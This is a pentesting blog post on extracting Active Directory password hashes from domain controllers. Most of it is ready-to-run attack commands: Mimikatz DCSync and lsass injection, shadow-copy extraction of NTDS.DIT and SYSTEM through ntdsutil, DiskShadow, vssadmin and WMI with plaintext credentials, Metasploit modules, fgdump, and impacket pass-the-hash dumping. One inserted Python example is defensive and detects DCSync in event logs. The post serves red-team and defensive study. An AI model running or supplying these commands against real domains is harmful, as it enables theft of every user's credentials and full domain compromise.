Dumping Domain Password Hashes


    During penetration tests in which domain administrator access has been achieved, it is very common to extract the password hashes of all domain users for offline cracking and analysis. These hashes are stored on the domain controller in the Active Directory database file (NTDS.DIT), alongside the rest of the directory data such as user objects and group memberships. The hashes inside the database are encrypted with a key derived from the boot key kept in the SYSTEM registry hive, which is why the SYSTEM hive has to be collected together with NTDS.DIT whenever the file itself is extracted.

    The NTDS.DIT file is held open by the operating system while Active Directory is running and therefore cannot simply be copied to another location. By default the file is found in the following location:

    C:\Windows\NTDS\NTDS.dit

    There are various techniques that can be used to extract this file, or the information stored inside it. The majority of them rely on one of the following methods:

    • Domain Controller Replication Services (DCSync)
    • Native Windows binaries (volume shadow copies, ntdsutil, diskshadow)
    • WMI

    Mimikatz

    Mimikatz has a feature (dcsync) which uses the Directory Replication Service (DRS) remote protocol to request the password hashes from a domain controller, in the same way that another domain controller would during replication. The technique does not require code execution on the domain controller or access to the NTDS.DIT file on disk: it can be executed from any system that is part of the domain, in the context of an account holding the replication extended rights (DS-Replication-Get-Changes and DS-Replication-Get-Changes-All), which domain administrators have by default. It is therefore the standard technique for red teams, as it is less noisy than touching the database on the domain controller itself, although the replication request is still recorded by the domain controller as a directory service access event (ID 4662) when that audit subcategory is enabled.

    lsadump::dcsync /domain:pentestlab.local /all /csv

    Mimikatz – Dump Domain Hashes via DCSync

    By specifying a domain username with the /user parameter Mimikatz dumps all the account information of that particular user, including its password hash.

    lsadump::dcsync /domain:pentestlab.local /user:test

    Mimikatz – Dump User Hash via DCSync
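    The audit trail that DCSync leaves is worth looking at from the defender's side as well. The following Python is an added example, not part of the original post or of Mimikatz: it takes Security event 4662 records (here constructed dictionaries that mirror the fields of real 4662 and 4624 entries; the account names, object names and timestamps are invented) and flags replication requests that do not come from a known domain controller account. The allowlist KNOWN_REPLICATORS is an assumption and has to be populated from the environment, for example from Get-ADDomainController output.

```python
"""Flag DCSync-style replication requests in Windows Security event 4662.

Added example, not part of the original post or of Mimikatz. SAMPLE_EVENTS
is constructed to mirror the fields of real 4662/4624 entries; the accounts,
object names and timestamps are invented.
"""
import re

# Extended rights that authorise directory replication. Any of them in the
# Properties field of a 4662 event means the subject requested directory
# replication, which is exactly what lsadump::dcsync does over DRSUAPI.
REPLICATION_RIGHTS = {
    "1131f6aa-9c07-11d1-f79f-00c04fc2dcd2": "DS-Replication-Get-Changes",
    "1131f6ad-9c07-11d1-f79f-00c04fc2dcd2": "DS-Replication-Get-Changes-All",
    "89e95b76-444d-4c62-991a-0facbeda640c": "DS-Replication-Get-Changes-In-Filtered-Set",
}

# Accounts that replicate legitimately: the computer accounts of the domain
# controllers and, where deployed, the Azure AD Connect sync account.
# Assumption: this set is maintained from Get-ADDomainController output.
KNOWN_REPLICATORS = {"PENTESTLAB\\DC$", "PENTESTLAB\\DC2$"}

_GUID_RE = re.compile(r"\{([0-9a-fA-F-]{36})\}")


def replication_rights_in(properties):
    """Names of the replication rights listed in a 4662 Properties string."""
    names = []
    for guid in _GUID_RE.findall(properties):
        name = REPLICATION_RIGHTS.get(guid.lower())
        if name:
            names.append(name)
    return names


def detect_dcsync(events, known_replicators=KNOWN_REPLICATORS):
    """One alert per 4662 event that requests replication rights from an
    account that is not a known domain controller."""
    allow = {acct.upper() for acct in known_replicators}
    alerts = []
    for ev in events:
        if ev.get("EventID") != 4662:
            continue
        rights = replication_rights_in(ev.get("Properties", ""))
        if not rights:
            continue  # ordinary directory access, not replication
        account = "%s\\%s" % (ev.get("SubjectDomainName", ""), ev.get("SubjectUserName", ""))
        if account.upper() in allow:
            continue  # a DC replicating with a DC
        alerts.append({"time": ev.get("TimeCreated"), "account": account,
                       "object": ev.get("ObjectName"), "rights": rights})
    return alerts


# Constructed sample: one DC-to-DC replication, one DCSync from a user
# account, one unrelated 4662 (a property read) and one logon event.
DOMAIN_DNS = "{19195a5b-6da0-11d0-afd3-00c04fd930c9}"  # domainDNS class GUID
SAMPLE_EVENTS = [
    {"EventID": 4662, "TimeCreated": "2018-07-04T10:12:01", "SubjectDomainName": "PENTESTLAB",
     "SubjectUserName": "DC2$", "ObjectName": "DC=pentestlab,DC=local",
     "Properties": "Control Access\n\t{1131f6aa-9c07-11d1-f79f-00c04fc2dcd2}\n"
                   "\t{1131f6ad-9c07-11d1-f79f-00c04fc2dcd2}\n\t" + DOMAIN_DNS},
    {"EventID": 4662, "TimeCreated": "2018-07-04T10:15:44", "SubjectDomainName": "PENTESTLAB",
     "SubjectUserName": "David", "ObjectName": "DC=pentestlab,DC=local",
     "Properties": "Control Access\n\t{1131f6aa-9c07-11d1-f79f-00c04fc2dcd2}\n"
                   "\t{1131f6ad-9c07-11d1-f79f-00c04fc2dcd2}\n\t" + DOMAIN_DNS},
    {"EventID": 4662, "TimeCreated": "2018-07-04T10:16:02", "SubjectDomainName": "PENTESTLAB",
     "SubjectUserName": "David", "ObjectName": "CN=test,CN=Users,DC=pentestlab,DC=local",
     "Properties": "Read Property\n\t{bf967aba-0de6-11d0-a285-00aa003049e2}"},
    {"EventID": 4624, "TimeCreated": "2018-07-04T10:15:40", "SubjectDomainName": "PENTESTLAB",
     "SubjectUserName": "David", "Properties": ""},
]

if __name__ == "__main__":
    for alert in detect_dcsync(SAMPLE_EVENTS):
        print(alert["time"], alert["account"], alert["object"], ", ".join(alert["rights"]))
```

    Filtering on the replication GUIDs is what keeps this usable: 4662 is a very high-volume event, and nearly all of it is ordinary property reads. Because an attacker who already holds a domain controller's computer account hash (as the impacket secretsdump example later on this page does) shows up under that DC's account, an alert should be correlated with the source address of the matching logon rather than trusted on the account name alone.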

    Alternatively, when Mimikatz is executed directly on the domain controller, the password hashes can be dumped through the lsass.exe process. privilege::debug acquires SeDebugPrivilege, which the injection requires.

    privilege::debug
    lsadump::lsa /inject

    Mimikatz – Dump Domain Hashes via lsass

    The password hashes of the domain users will be retrieved.

    Mimikatz – Dump domain hashes via lsadump

    Empire

    PowerShell Empire has two modules which can retrieve domain hashes via the DCSync attack. Both modules need to be executed in the context of a domain administrator and they use the Microsoft replication services. The modules rely on the Invoke-Mimikatz PowerShell script to execute the Mimikatz commands related to DCSync. The following module extracts the domain hashes in a format similar to the output of the Metasploit hashdump command.

    usemodule credentials/mimikatz/dcsync_hashdump

    Empire – DCSync Hashdump Module

    The DCSync module requires a user to be specified in order to extract all the information of that account.

    Empire – DCSync Module

    The following information will be obtained:

    Empire – DCSync Account Information

    Nishang

    Nishang is a PowerShell framework which enables red teamers and penetration testers to perform offensive operations against systems. The Copy-VSS script creates a volume shadow copy and automatically extracts the required files from it: NTDS.DIT, SAM and SYSTEM. The files are written into the current working directory or into any other folder specified with -DestinationDir.

    Import-Module .\Copy-VSS.ps1
    Copy-VSS
    Copy-VSS -DestinationDir C:\ShadowCopy\

    Nishang – Extract NTDS PowerShell

    Alternatively the script can be executed from an existing Meterpreter session by loading the PowerShell extension.

    load powershell
    powershell_import /root/Copy-VSS.ps1
    powershell_execute Copy-VSS

    Nishang – Extract NTDS Meterpreter

    It is also possible to open an interactive PowerShell prompt with the command powershell_shell in order to extract the files, once the script has been imported into the existing Meterpreter session.

    Copy-VSS
    Copy-VSS -DestinationDir C:\Ninja

    Nishang – Extract NTDS Meterpreter PowerShell

    PowerSploit

    PowerSploit contains a PowerShell script (VolumeShadowCopyTools.ps1) which uses the Volume Shadow Copy Service to create a new shadow copy of a volume, from which locked files can then be copied.

    Import-Module .\VolumeShadowCopyTools.ps1
    New-VolumeShadowCopy -Volume C:\
    Get-VolumeShadowCopy

    PowerSploit – VolumeShadowCopyTools

    Alternatively it can be executed from an existing Meterpreter session by loading the PowerShell extension.

    powershell_shell
    New-VolumeShadowCopy -Volume C:\
    Get-VolumeShadowCopy

    PowerSploit – Volume Shadow Copy

    Files can then be copied from the new shadow copy to a destination path with the copy command, using the device path reported for the shadow copy.

    Invoke-DCSync

    Invoke-DCSync is a PowerShell script developed by Nick Landers which leverages PowerView, Invoke-ReflectivePEInjection and a DLL wrapper of PowerKatz to retrieve hashes with the Mimikatz DCSync method. Executing the function directly will generate the following output:

    Invoke-DCSync

    Invoke-DCSync – PowerShell

    The results are formatted into four columns: Domain, User, RID and Hash. Executing Invoke-DCSync with the parameter -PWDumpFormat instead retrieves the hashes in the pwdump format user:id:lm:ntlm:::, which password crackers accept directly.

    Invoke-DCSync -PWDumpFormat

    Invoke-DCSync – PowerShell PWDump Format

    The same output can be achieved by running the script from an existing Meterpreter session.

    Invoke-DCSync Metasploit

    With the PWDumpFormat:

    Invoke-DCSync – Metasploit PWDump Format

    ntdsutil

    ntdsutil is a command line tool that ships with domain controllers and whose purpose is to enable administrators to access and manage the Active Directory database. It can be abused by penetration testers and red teams to take a snapshot of the existing ntds.dit file through its Install From Media (IFM) function; the snapshot can then be copied to another location for offline analysis and extraction of password hashes.

    ntdsutil
    activate instance ntds
    ifm
    create full C:\ntdsutil
    quit
    quit

    ntdsutil

    Two new folders will be generated: Active Directory and Registry. The NTDS.DIT file will be saved in the Active Directory folder and the SAM and SYSTEM hives will be saved in the Registry folder.

    ntdsutil – ntds

    DiskShadow

    DiskShadow is a Microsoft-signed binary which assists administrators with operations related to the Volume Shadow Copy Service (VSS). bohops originally wrote about abusing this binary on his blog. It has two modes, interactive and script, so a script file containing all the necessary commands can be used to automate the extraction of NTDS.DIT. The script file below creates a new volume shadow copy, exposes it as a drive letter, runs the copy command and finally deletes the shadow copy.

    set context persistent nowriters
    add volume c: alias someAlias
    create
    expose %someAlias% z:
    exec "cmd.exe" /c copy z:\windows\ntds\ntds.dit c:\exfil\ntds.dit
    delete shadows volume %someAlias%
    reset

    It should be noted that the DiskShadow binary needs to be executed from the C:\Windows\System32 path. If it is called from another path the script will not execute correctly.

    diskshadow.exe /s c:\diskshadow.txt

    DiskShadow

    Running the following command from the interactive interpreter lists all the shadow copies available on the system.

    diskshadow
    LIST SHADOWS ALL

    diskshadow – Retrieve Shadow Copies

    The SYSTEM registry hive should be copied as well, since it contains the boot key needed to decrypt the contents of the NTDS file.

    reg.exe save hklm\system c:\exfil\system.bak

    diskshadow – Copy system from Registry

    WMI

    Sean Metcalf demonstrated on his blog that it is possible to remotely extract the NTDS.DIT and SYSTEM files via WMI. The technique uses the vssadmin binary on the domain controller to create the volume shadow copy.

    wmic /node:dc /user:PENTESTLAB\David /password:pentestlab123!! process call create "cmd /c vssadmin create shadow /for=C: 2>&1"

    WMI – Create Volume Shadow Copy

    The copy command is then executed remotely in order to extract the NTDS.DIT file from the volume shadow copy into another directory on the target system.

    wmic /node:dc /user:PENTESTLAB\David /password:pentestlab123!! process call create "cmd /c copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\Windows\NTDS\NTDS.dit C:\temp\ntds.dit 2>&1"

    WMI – Copy NTDS File

    The same applies to the SYSTEM hive.

    wmic /node:dc /user:PENTESTLAB\David /password:pentestlab123!! process call create "cmd /c copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\Windows\System32\config\SYSTEM C:\temp\SYSTEM.hive 2>&1"

    WMI – Copy System File

    The extracted files can then be transferred from the domain controller to another Windows system for dumping the domain password hashes.

    PS C:\Users\test.PENTESTLAB> copy \\10.0.0.1\c$\temp\ntds.dit C:\temp
    PS C:\Users\test.PENTESTLAB> copy \\10.0.0.1\c$\temp\SYSTEM.hive C:\temp

    Transfer Files via Copy

    If a Golden Ticket has been generated, it can be used instead of credentials to authenticate to the domain controller via Kerberos.

    vssadmin

    vssadmin is a Windows command line utility which enables administrators to take backups of volumes and files even while they are in use by the operating system. The Volume Shadow Copy Service runs as a Windows service and requires the filesystem to be NTFS, which all modern Windows systems use by default. Executing the following from a Windows command prompt creates a snapshot of the C: drive, so that files which are not normally accessible can be copied to another location (local folder, network share or removable media).

    vssadmin create shadow /for=C:

    vssadmin – Create Volume Shadow Copy

    The snapshot (HarddiskVolumeShadowCopy1) is a read-only, point-in-time image of the C: drive that the operating system is not holding open, so the files it contains can be accessed and copied elsewhere. The following copy commands copy the NTDS.DIT and SYSTEM files into a newly created folder on the local drive named ShadowCopy.

    copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\Windows\NTDS\NTDS.dit C:\ShadowCopy
    copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\Windows\System32\config\SYSTEM C:\ShadowCopy

    Copy Files from Volume Shadow Copy

    These files need to be copied from the domain controller to another host for further processing.

    ShadowCopy – Files

    vssown

    Similar to the vssadmin utility, Tim Tomes developed vssown, a VBScript which can create and delete volume shadow copies, run arbitrary executables from an unmounted shadow copy, and start and stop the Volume Shadow Copy service.

    cscript vssown.vbs /start
    cscript vssown.vbs /create c
    cscript vssown.vbs /list
    cscript vssown.vbs /delete

    vssown – Volume Shadow Copy

    The required files can then be copied with the copy command.

    copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy11\windows\ntds\ntds.dit C:\vssown
    copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy11\windows\system32\config\SYSTEM C:\vssown
    copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy11\windows\system32\config\SAM C:\vssown

    vssown – Copy NTDS, SYSTEM and SAM Files

    Metasploit

    Metasploit Framework has a module which authenticates directly to the domain controller via the Server Message Block (SMB) service, creates a volume shadow copy of the system drive and downloads copies of the NTDS.DIT file and SYSTEM hive into the Metasploit loot directory. These files can then be used with other tools, such as impacket, to extract the Active Directory password hashes.

    auxiliary/admin/smb/psexec_ntdsgrab

    Metasploit – NTDS Module

    There is also a post-exploitation module which can be run against an existing Meterpreter session in order to retrieve domain hashes via the ntdsutil method.

    windows/gather/credentials/domain_hashdump

    Metasploit – Domain Hashdump

    Alternatively, if there is an existing Meterpreter session on the domain controller, the command hashdump can be used. This method is not considered safe, however, as it might crash the domain controller.

    hashdump

    Metasploit – Hashdump on DC

    fgdump

    fgdump is an old executable which can extract LanMan and NTLM password hashes. It can be executed locally, or remotely if local administrator credentials have been acquired. During execution fgdump attempts to disable any antivirus running on the system and, if successful, writes all the data into two files. If an antivirus or endpoint solution is present, fgdump should not be used as a method of dumping password hashes, since it is flagged by most antivirus vendors including Microsoft's Windows Defender.

    fgdump.exe

    fgdump – Domain Controller

    The password hashes can be retrieved by examining the contents of the .pwdump file.

    type 127.0.0.1.pwdump

    fgdump – pwdump File

    NTDS Extraction

    Impacket is a collection of Python scripts that can be used to perform various tasks, including extraction of the contents of the NTDS file. The impacket-secretsdump script requires the SYSTEM hive and the NTDS database file when it is run against the LOCAL target.

    impacket-secretsdump -system /root/SYSTEM -ntds /root/ntds.dit LOCAL

    impacket – Extract NTDS Contents

    Furthermore, impacket can dump the domain password hashes remotely through the same replication method that DCSync uses (-just-dc), authenticating with the domain controller's computer account and its NTLM hash.

    impacket-secretsdump -hashes aad3b435b51404eeaad3b435b51404ee:0f49aab58dd8fb314e268c4c6a65dfc9 -just-dc PENTESTLAB/dc\$@10.0.0.1

    impacket – Extract NTDS Contents Remotely

    As an alternative to impacket, the NTDSDumpEx binary can extract the domain password hashes from a Windows host.

    NTDSDumpEx.exe -d ntds.dit -s SYSTEM.hive

    NTDSDumpEx

    There is also a shell script, adXtract, that can export the usernames and password hashes into a format that can be used by common password crackers such as John the Ripper and Hashcat.

    ./adXtract.sh /root/ntds.dit /root/SYSTEM pentestlab

    adXtract

    The script writes all the information into various files under the project name and, when the decryption of the NTDS database file is finished, prints the list of users and password hashes to the console. The script provides extensive information about the domain users, as shown below.

    adXtract – List of Users

    The password hashes will be presented in the following format.

    adXtract – Password Hashes

    Source: https://pentestlab.blog/2018/07/04/dumping-domain-password-hashes/